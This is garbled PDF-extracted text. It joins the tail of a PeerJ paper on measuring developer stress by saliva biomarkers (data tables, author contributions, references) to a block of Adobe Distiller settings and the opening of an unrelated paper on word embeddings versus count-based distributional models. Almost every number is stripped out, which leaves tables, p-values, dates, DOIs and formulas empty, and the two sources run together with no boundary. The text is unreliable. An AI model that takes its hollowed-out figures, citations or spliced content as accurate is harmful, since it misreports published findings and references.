average: . . . . . . . . t-test: p = . p = . p = . p = . cliff's delta − . − . − . − . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a results of the measurement of alphaamylase (international unit per liter) in the gathered saliva samples. a(s ) (u/l) a(s ) (u/l) a(s ) (u/l) a(s ) (u/l) cont. exp. cont. exp. cont. exp. cont. exp. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . – . . . . . – . – . . . . . – . – . . . . . – . – . . . . . – – – . – . – . – – – . – . – . – – – . – . – . – – – . – . – . – – – . – . – – – – – – – . – – – – – – – . – – – – – median: . . . . . . . average: . . . . . . . . wilcoxon u: p = . p = . p = . p = . cliff's delta − . − . − . − . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a results of the measurement of cortisol (picogramm per milliliter) in the gathered saliva samples on the second experiment. c(s ) (pg/ml) c(s ) (pg/ml) c(s ) (pg/ml) cont. exp. cont. exp. cont. exp. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . – . – . – . average: . . . . . . median: . . . . . . wilcoxon u: p = . p = . p = . cliff's delta: . . . table a results of the measurement of alphaamylase (international unit per liter) in the gathered saliva samples for the second experiment. a(s ) (u/l) a(s ) (u/l) a(s ) (u/l) cont. exp. cont. exp. cont. exp. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . – . – . – . average: . . . . . . median: . . . . . t-test: p = . p = . p = . cliff's delta: − . − . − . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ questionnaires socio-demographic questions panas and esr (in german translation as used by schneider et al. ( )) self-efficacy questions acknowledgements we thank our participants for taking part in our study. we are grateful for the feedback provided by two anonymous reviewers and the editor. our thanks to katharina plett for the professional proofreading of this article. additional information and declarations funding the authors received no funding for this work. competing interests stefan wagner is an academic editor for peerj. author contributions � jan-peter ostberg conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � daniel graziotin analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � stefan wagner analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � birgit derntl conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: all the data is available in the appendices. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references akula b, cusick j. . impact of overtime and stress on software quality. in: th international symposium on management, engineering, and informatics (mei ), orlando, florida, usa. amin a, basri s, hassan mf, rehman m. . software engineering occupational stress and knowledge sharing in the context of global software development. in: national postgraduate conference (npc). ieee, – . andreassi jl. . psychophysiology: human behavior & physiological response. east sussex: psychology press. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bandura a. . self-efficacy: the exercise of control. new york: macmillan publishers. behroozi m, lui a, moore i, ford d, parnin c. . dazed: measuring the cognitive load of solving technical interview problems at the whiteboard. in: proceedings of the th international conference on software engineering: new ideas and emerging results, icse-nier ’ . new york: acm, – . birbaumer n, schmidt rf. . biologische psychologie. seventh edition. berlin: springer-verlag. boucsein w. . arbeitspsychologische beanspruchungsforschung heute—eine herausforderung an die psychophysiologie. psychologische rundschau ( ): – . boucsein w. . psychophysiology in the workplace—goals and methods. international journal of psychophysiology ( ): doi . / - ( ) -c. brown ja, ivanov v, rogers a, succi g, tormasov a, yi j. . toward a better understanding of how to develop software under stress-drafting the lines for future research. available at http://arxiv.org/abs/ . . cannon wb. . bodily changes in pain, hunger, fear and rage: an account of recent researches into the function of emotional excitement. jama ( ): . chatterton rt, vogelsong km, lu y-c, ellman ab, hudgens ga. . salivary α-amylase as a measure of endogenous adrenergic activity. clinical physiology ( ): – doi . /j. - x. .tb .x. chiappelli f, iribarren fj, prolo p. . salivary biomarkers in psychobiological medicine. bioinformation ( ): – doi . / . chilton ma, hardgrave bc, armstrong dj. . performance and strain levels of it workers engaged in rapidly changing environments: a person-job fit perspective. acm sigmis database: the database for advances in information systems ( ): – doi . / . . cohen s. . aftereffects of stress on human performance and social behavior: a review of research and theory. psychological bulletin ( ): – doi . / - . . . . cohen s, janicki-deverts d, miller ge. . psychological stress and disease. jama ( ): – doi . /jama. . . . cohen s, kamarck t, mermelstein r. . a global measure of perceived stress. journal of health and social behavior ( ): – doi . / . cohen s, kessler rc, gordon lu. . measuring stress: a guide for health and social scientists. oxford: oxford university press. cruz s, da silva fq, capretz lf. . forty years of research on personality in software engineering: a mapping study. computers in human behavior : – doi . /j.chb. . . . de jonge bp, jan b, ybema jf, de wolff cj. . psychosocial aspects of occupational stress. handbook of work and organizational psychology: work psychology : . feldt r, torkar r, angelis l, samuelsson m. . towards individualized software engineering. in: cheng l-t, sillito j, storey m-a, tessem b, venolia g, de souza c, dittrich y, john m, hazzan o, maurer f, sharp h, singer j, sim se, eds. towards individualized software engineering, volume the international workshop. new york: acm press, – . folkman s. . the case for positive emotions in the stress process. anxiety, stress, and coping ( ): – doi . / . fritz t, begel a, müller sc, yigit-elliott s, züger m. . using psycho-physiological measures to assess task difficulty in software development. in: proceedings of the th international conference on software engineering. acm, – . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - ( ) -c http://arxiv.org/abs/ . http://dx.doi.org/ . /j. - x. .tb .x http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jama. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fujigaki y, asakura t, haratani t. . work stress and depressive symptoms among japanese information systems managers. industrial health ( ): – doi . /indhealth. . . gevins a, cutillo b. . neuroelectric evidence for distributed processing in human working memory. electroencephalography and clinical neurophysiology ( ): – doi . / - ( ) -g. goldstein ds. . clinical assessment of sympathetic responses to stress. annals of the new york academy of sciences ( ): – doi . /j. - . .tb .x. graziotin d. . towards a theory of affect and software developers’ performance. phd thesis. free university of bozen-bolzano, italy. graziotin d, fagerholm f, wang x, abrahamsson p. . on the unhappiness of software developers. in: proceedings of the st international conference on evaluation and assessment in software engineering (ease’ ). new york: acm press, – . graziotin d, wang x, abrahamsson p. a. the affect of software developers: common misconceptions and measurements. in: th international workshop on cooperative and human aspects of software engineering (chase). ieee/acm, – . graziotin d, wang x, abrahamsson p. b. understanding the affect of developers: theoretical background and guidelines for psychoempirical software engineering. in: proceedings of the th international workshop on social software engineering. acm, – . gren l. . standards of validity and the validity of standards in behavioral software engineering research. new york: acm press. hellhammer dh, wüst s, kudielka bm. . salivary cortisol as a biomarker in stress research. psychoneuroendocrinology ( ): – doi . /j.psyneuen. . . . hjortskov n, rissén d, blangsted ak, fallentin n, lundberg u, søgaard k. . the effect of mental stress on heart rate variability and blood pressure during computer work. european journal of applied physiology ( – ): – doi . /s - - -z. hyman j, baldry c, scholarios d, bunzel d. . work-life imbalance in call centres and software development. british journal of industrial relations ( ): – doi . / - . . hyun j, sliwinski mj, smyth jm. . waking up on the wrong side of the bed: the effects of stress anticipation on working memory in daily life. journals of gerontology ( ): – doi . /geronb/gby . janke w, erdmann g, boucsein w. . der stressverarbeitungsfragebogen (svf). göttingen: hogrefe, . jennett c, cox al, cairns p, dhoparee s, epps a, tijs t, walton a. . measuring and defining the experience of immersion in games. international journal of human–computer studies ( ): – doi . /j.ijhcs. . . . jerusalem m, schwarzer r. . skala zur allgemeinen selbstwirksamkeitserwartung. skalen zur erfassung von lehrer-und schülermerkmalen. in: dokumentation der psychometrischen verfahren im rahmen der wissenschaftlichen begleitung des modellversuchs selbstwirksame schulen. berlin: freie universität. kang d-h, fox c. . neuroendocrine and leukocyte responses and pulmonary function to acute stressors. annals of behavioral medicine ( ): – doi . /bf . kanner ad, coyne jc, schaefer c, lazarus rs. . comparison of two modes of stress measurement: daily hassles and uplifts versus major life events. journal of behavioral medicine ( ): – doi . /bf . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /indhealth. . http://dx.doi.org/ . / - ( ) -g http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.psyneuen. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / - . http://dx.doi.org/ . /geronb/gby http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kaufmann i, pornschlegel h, udris i. . arbeitsbelastung und beanspruchung. humane arbeit-leitfaden für arbeitnehmer : – . khalfa s, bella sd, roy m, peretz i, lupien sj. . effects of relaxing music on salivary cortisol level after psychological stress. annals-new york academy of sciences : – . king mf, bruner gc. . social desirability bias: a neglected aspect of validity testing. psychology & marketing ( ): – doi . /(sici) - ( ) : < ::aid-mar > . .co; - . kirschbaum c. . trier social stress test. encyclopedia of psychopharmacology : – . kirschbaum c, hellhammer dh. . salivary cortisol in psychoneuroendocrine research: recent developments and applications. psychoneuroendocrinology ( ): – doi . / - ( ) - . kogler l, seidel e-m, metzler h, thaler h, boubela rn, pruessner jc, kryspin-exner i, gur rc, windischberger c, moser e, habel u, derntl b. . impact of self-esteem and sex on stress reactions. scientific reports ( ): doi . /s - - -w. lademann j, mertesacker h, gebhardt b. . psychische erkrankungen im fokus der gesundheitsreporte der krankenkassen. psychotherapeutenjournal ( ): – . lazarus rs. . psychological stress and the coping process. new york: mcgraw-hill education. lazarus rs. . theory-based stress measurement. psychological inquiry ( ): – doi . /s pli _ . lenberg p, feldt r, wallgren lg. . behavioral software engineering: a definition and systematic literature review. journal of systems and software : – doi . /j.jss. . . . lindholm j, juul s, jørgensen jol, astrup j, bjerre p, feldt-rasmussen u, hagen c, jørgensen j, kosteljanetz m, kristensen l, laurberg p, schmidt k, weeke j. . incidence and late prognosis of cushing’s syndrome: a population-based study. journal of clinical endocrinology & metabolism ( ): – . lohmann-haislah a. . psychische anforderungen, ressourcen und befinden. dortmund-berlin-dresden: bundesanstalt für arbeitsschutz und arbeitsmedizin. meier a, kropp m, anslow c, biddle r. . stress in agile software development: practices and outcomes. cham: springer international publishing, – . mueller st, piper bj. . the psychology experiment building language (pebl) and pebl test battery. journal of neuroscience methods : – doi . /j.jneumeth. . . . müller sc, fritz t. . using (bio) metrics to predict code quality online. in: proceedings of the th international conference on software engineering. acm, – . nater um, rohleder n, gaab j, berger s, jud a, kirschbaum c, ehlert u. . human salivary alpha-amylase reactivity in a psychosocial stress paradigm. international journal of psychophysiology ( ): – doi . /j.ijpsycho. . . . neto rab, de carvalho jf. . diagnosis and classification of addison’s disease (autoimmune adrenalitis). autoimmunity reviews ( – ): – doi . /j.autrev. . . . noack h, nolte l, nieratschker v, habel u, derntl b. . imaging stress: an overview of stress induction methods in the mr scanner. journal of neural transmission ( ): – doi . /s - - -y. noto y, sato t, kudo m, kurata k, hirota k. . the relationship between salivary biomarkers and state-trait anxiety inventory score under mental arithmetic stress: a pilot study. anesthesia & analgesia ( ): – doi . / .ane. . . d. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-mar % e . .co; - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /s pli _ http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . /j.ijpsycho. . . http://dx.doi.org/ . /j.autrev. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / .ane. . . d http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ostberg j-p, graziotin d, wagner s, derntl b. . towards the assessment of stress and emotional responses of a salutogenesis-enhanced software tool using psychophysiological measurements. in: proceedings of the nd international workshop on emotion awareness in software engineering. ieee press, – . ostberg j-p, wagner s. . at ease with your warnings: the principles of the salutogenesis model applied to automatic static analysis. in: ieee rd international conference on software analysis, evolution, and reengineering (saner). vol. . – . paulhus dl. . measurement and control of response bias. in: robinson jp, shaver pr, wrightsman ls, eds. measures of social psychological attitudes: measures of personality and social psychological attitudes. vol. . cambridge: academic press. peacock ej, wong pt. . the stress appraisal measure (sam): a multidimensional approach to cognitive appraisal. stress and health ( ): – . pittenger dj. . the utility of the myers-briggs type indicator. review of educational research ( ): – doi . / . plarre k, raij a, hossain sm, ali aa, nakajima m, al’absi m, ertin e, kamarck t, kumar s, scott m, siewiorek d, smailagic a, wittmers le. . continuous inference of psychological stress from sensory measurements collected in the natural environment. in: th international conference on information processing in sensor networks (ipsn). ieee, – . pressman sd, cohen s. . does positive affect influence health? psychological bulletin ( ): – doi . / - . . . . rahe rh. . stressful life events-their nature and effects. psychosomatic medicine ( ): – doi . / - - . rajeswari k, anantharaman r. . development of an instrument to measure stress among software professionals: factor analytic study. in: proceedings of the sigmis conference on computer personnel research. acm, – . reinhardt t, schmahl c, wüst s, bohus m. . salivary cortisol, heart rate, electrodermal activity and subjective stress responses to the mannheim multicomponent stress test (mmst). psychiatry research ( ): – doi . /j.psychres. . . . richter p, hacker w. . belastung und beanspruchung: stress, ermüdung und burnout im arbeitsleben. heidelberg: asanger roland verlag. rommel e, pimlott j. . rommel: in his own words. london: amber books ltd. schneider f, gur rc, gur re, muenz lr. . standardized mood induction with happy and sad facial expressions. psychiatry research ( ): – doi . / - ( ) - . schneider f, weiss u, kessler c, müller-gärtner h-w, posse s, salloum jb, grodd w, himmelmann f, gaebel w, birbaumer n. . subcortical correlates of differential classical conditioning of aversive emotional reactions in social phobia. biological psychiatry ( ): – . schwarz n. . self-reports: how the questions shape the answers. american psychologist ( ): – doi . / - x. . . . selye h. . the general adaptation syndrome and the diseases of adaptation . journal of clinical endocrinology & metabolism ( ): – doi . /jcem- - - . selye h. . the stress of life (revised edition). new york: mcgraw-hill. shaw d. . facebook’s flawed emotion experiment: antisocial research on social network users. research ethics ( ): – doi . / . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - - http://dx.doi.org/ . /j.psychres. . . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /jcem- - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sonnentag s, brodbeck fc, heinbokel t, stolte w. . stressor-burnout relationship in software development teams. journal of occupational and organizational psychology ( ): – doi . /j. - . .tb .x. strahler j, skoluda n, kappert mb, nater um. . simultaneous measurement of salivary cortisol and alpha-amylase: application and recommendations. neuroscience & biobehavioral reviews : – doi . /j.neubiorev. . . . suni lopez f, condori-fernández n, catala bolos a. . towards real-time automatic stress detection for office workplaces. in: proceedings of the th international conference, simbig , september – , , lima, peru. thompson cw, roe j, aspinall p, mitchell r, clow a, miller d. . more green space is linked to less stress in deprived communities: evidence from salivary cortisol patterns. landscape and urban planning ( ): – doi . /j.landurbplan. . . . van eck m, berkhof h, nicolson n, sulon j. . the effects of perceived stress, traits, mood states, and stressful daily events on salivary cortisol. psychosomatic medicine ( ): – doi . / - - . vrijkotte tg, van doornen lj, de geus ej. . effects of work stress on ambulatory blood pressure, heart rate, and heart rate variability. hypertension ( ): – doi . / .hyp. . . . wagner s, mendez d, felderer m, graziotin d, kalinowski m. . challenges in survey research. in: felderer m, travassos gh, eds. contemporary empirical methods in software engineering. cham: springer international publishing, – . watson d, clark la, tellegen a. . development and validation of brief measures of positive and negative affect: the panas scales. journal of personality and social psychology ( ): – doi . / - . . . . weinert ab. . organisations-und personalpsychologie. weinheim: verlagsgruppe beltz. weiss u, salloum jb, schneider f. . correspondence of emotional self-rating with facial expression. psychiatry research ( ): – doi . /s - ( ) - . world health organization and others. . health factors involved in working under conditions of heat stress: report of a who scientific group. geneva: world health organization. available at https://apps.who.int/iris/bitstream/handle/ / /who_trs_ .pdf. world health organization. . mental health: facing the challenges, building solutions: report from the who european ministerial conference. copenhagen: who regional office europe. available at https://www.euro.who.int/__data/assets/pdf_file/ / /e .pdf. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.neubiorev. . . http://dx.doi.org/ . /j.landurbplan. . . http://dx.doi.org/ . / - - http://dx.doi.org/ . / .hyp. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /s - ( ) - https://apps.who.int/iris/bitstream/handle/ / /who_trs_ .pdf https://www.euro.who.int/__data/assets/pdf_file/ / /e .pdf https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a methodology for psycho-biological assessment of stress in software engineering introduction related work background stress measurement techniques proposed method for stress measurement two studies implementing the proposed method lessons learned conclusion appendix flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice improving distributional similarity with lessons learned from word embeddings omer levy yoav goldberg ido dagan computer science department bar-ilan university ramat-gan, israel {omerlevy,yogo,dagan}@cs.biu.ac.il abstract recent trends suggest that neural- network-inspired word embedding models outperform traditional count-based distri- butional models on word similarity and analogy detection tasks. we reveal that much of the performance gains of word embeddings are due to certain system design choices and hyperparameter op- timizations, rather than the embedding algorithms themselves. furthermore, we show that these modifications can be transferred to traditional distributional models, yielding similar gains. in contrast to prior reports, we observe mostly local or insignificant performance differences between the methods, with no global advantage to any single approach over the others. introduction understanding the meaning of a word is at the heart of natural language processing (nlp). while a deep, human-like, understanding remains elu- sive, many methods have been successful in recov- ering certain aspects of similarity between words. recently, neural-network based approaches in which words are “embedded” into a low- dimensional space were proposed by various au- thors (bengio et al., ; collobert and weston, ). these models represent each word as a d- dimensional vector of real numbers, and vectors that are close to each other are shown to be se- mantically related. in particular, a sequence of pa- pers by mikolov et al. ( a; b) culminated in the skip-gram with negative-sampling training method (sgns): an efficient embedding algorithm that provides state-of-the-art results on various lin- guistic tasks. it was popularized via word vec, a program for creating word embeddings. a recent study by baroni et al. ( ) con- ducts a set of systematic experiments compar- ing word vec embeddings to the more tradi- tional distributional methods, such as pointwise mutual information (pmi) matrices (see turney and pantel ( ) and baroni and lenci ( ) for comprehensive surveys). these results suggest that the new embedding methods consistently out- perform the traditional methods by a non-trivial margin on many similarity-oriented tasks. how- ever, state-of-the-art embedding methods are all based on the same bag-of-contexts representation of words. furthermore, analysis by levy and goldberg ( c) shows that word vec’s sgns is implicitly factorizing a word-context pmi ma- trix. that is, the mathematical objective and the sources of information available to sgns are in fact very similar to those employed by the more traditional methods. what, then, is the source of superiority (or per- ceived superiority) of these recent embeddings? while the focus of the presentation in the word- embedding literature is on the mathematical model and the objective being optimized, other factors af- fect the results as well. in particular, embedding algorithms suggest some natural hyperparameters that can be tuned; many of which were already tuned to some extent by the algorithms’ design- ers. some hyperparameters, such as the number of negative samples to use, are clearly marked as tunable. other modifications, such as smoothing the negative-sampling distribution, are reported in passing and considered thereafter as part of the al- gorithm. others still, such as dynamically-sized context windows, are not even mentioned in some of the papers, but are part of the canonical imple- mentation. all of these modifications and system design choices, which we collectively denote as hyperparameters, are part of the final algorithm, and, as we show, have a substantial impact on per- formance. in this work, we make these hyperparameters explicit, and show how they can be adapted and transferred into the traditional count-based ap- proach. to asses how each hyperparameter con- tributes to the algorithms’ performance, we con- duct a comprehensive set of experiments and com- pare four different representation methods, while controlling for the various hyperparameters. once adapted across methods, hyperparameter tuning significantly improves performance in ev- ery task. in many cases, changing the setting of a single hyperparameter yields a greater increase in performance than switching to a better algorithm or training on a larger corpus. in particular, word vec’s smoothing of the negative sampling distribution can be adapted to ppmi-based methods by introducing a novel, smoothed variant of the pmi association measure (see section . ). using this variant increases per- formance by over points per task, on average. we suspect that this smoothing partially addresses the “achilles’ heel” of pmi: its bias towards co- occurrences of rare words. we also show that when all methods are allowed to tune a similar set of hyperparameters, their per- formance is largely comparable. in fact, there is no consistent advantage to one algorithmic approach over another, a result that contradicts the claim that embeddings are superior to count-based methods. background we consider four word representation methods: the explicit ppmi matrix, svd factorization of said matrix, sgns, and glove. for historical reasons, we refer to ppmi and svd as “count- based” representations, as opposed to sgns and glove, which are often referred to as “neural” or “prediction-based” embeddings. all of these methods (as well as all other “skip-gram”-based embedding methods) are essentially bag-of-words models, in which the representation of each word reflects a weighted bag of context-words that co- occur with it. such bag-of-word embedding mod- els were previously shown to perform as well as or better than more complex embedding methods on similarity and analogy tasks (mikolov et al., a; pennington et al., ). notation we assume a collection of words w ∈ vw and their contexts c ∈ vc, where vw and vc are the word and context vocabularies, and denote the collection of observed word-context pairs as d. we use #(w,c) to denote the number of times the pair (w,c) appears in d. similarly, #(w) =∑ c′∈vc #(w,c ′) and #(c) = ∑ w′∈vw #(w ′,c) are the number of times w and c occurred in d, respectively. in some algorithms, words and con- texts are embedded in a space of d dimensions. in these cases, each word w ∈ vw is associated with a vector ~w ∈ rd and similarly each con- text c ∈ vc is represented as a vector ~c ∈ rd. we sometimes refer to the vectors ~w as rows in a |vw |×d matrix w , and to the vectors ~c as rows in a |vc|×d matrix c. when referring to embed- dings produced by a specific method x, we may use wx and cx (e.g. wsgns or csv d). all vec- tors are normalized to unit length before they are used for similarity calculation, making cosine sim- ilarity and dot-product equivalent (see section . for further discussion). contexts d is commonly obtained by taking a corpus w ,w , . . . ,wn and defining the contexts of word wi as the words surrounding it in an l- sized window wi−l, . . . ,wi− ,wi+ , . . . ,wi+l. while other definitions of contexts have been stud- ied (padó and lapata, ; baroni and lenci, ; levy and goldberg, a) this work fo- cuses on fixed-window bag-of-words contexts. . explicit representations (ppmi matrix) the traditional way to represent words in the distributional approach is to construct a high- dimensional sparse matrix m, where each row represents a word w in the vocabulary vw and each column a potential context c ∈ vc. the value of each matrix cell mij represents the association between the word wi and the context cj. a popular measure of this association is pointwise mutual in- formation (pmi) (church and hanks, ). pmi is defined as the log ratio between w and c’s joint probability and the product of their marginal prob- abilities, which can be estimated by: pmi(w,c) = log p̂(w,c) p̂(w)p̂(c) = log #(w,c)·|d| #(w)·#(c) the rows of mpmi contain many entries of word- context pairs (w,c) that were never observed in the corpus, for which pmi(w,c) = log = −∞. a common approach is thus to replace the mpmi matrix with mpmi , in which pmi(w,c) = in cases where #(w,c) = . a more consistent ap- proach is to use positive pmi (ppmi), in which all negative values are replaced by : ppmi(w,c) = max (pmi (w,c) , ) bullinaria and levy ( ) showed that mppmi outperforms mpmi on semantic similarity tasks. a well-known shortcoming of pmi, which per- sists in ppmi, is its bias towards infrequent events (turney and pantel, ). a rare context c that co-occurred with a target word w even once, will often yield relatively high pmi score because p̂(c), which is in pmi’s denominator, is very small. this creates a situation in which the top “distributional features” (contexts) of w are often extremely rare words, which do not necessarily appear in the respective representations of words that are semantically similar to w. nevertheless, the ppmi measure is widely regarded as state-of- the-art for these kinds of distributional-similarity models. . singular value decomposition (svd) while sparse vector representations work well, there are also advantages to working with dense low-dimensional vectors, such as improved com- putational efficiency and, arguably, better gener- alization. such vectors can be obtained by per- forming dimensionality reduction over the sparse high-dimensional matrix. a common method of doing so is truncated sin- gular value decomposition (svd), which finds the optimal rank d factorization with respect to l loss (eckart and young, ). it was popular- ized in nlp via latent semantic analysis (lsa) (deerwester et al., ). svd factorizes m into the product of three ma- trices u · Σ · v >, where u and v are orthonor- mal and Σ is a diagonal matrix of eigenvalues in decreasing order. by keeping only the top d ele- ments of Σ, we obtain md = ud · Σd · v >d . the dot-products between the rows of w = ud·Σd are equal to the dot-products between rows of md. in the setting of word-context matrices, the dense, d-dimensional rows of w can substitute the very 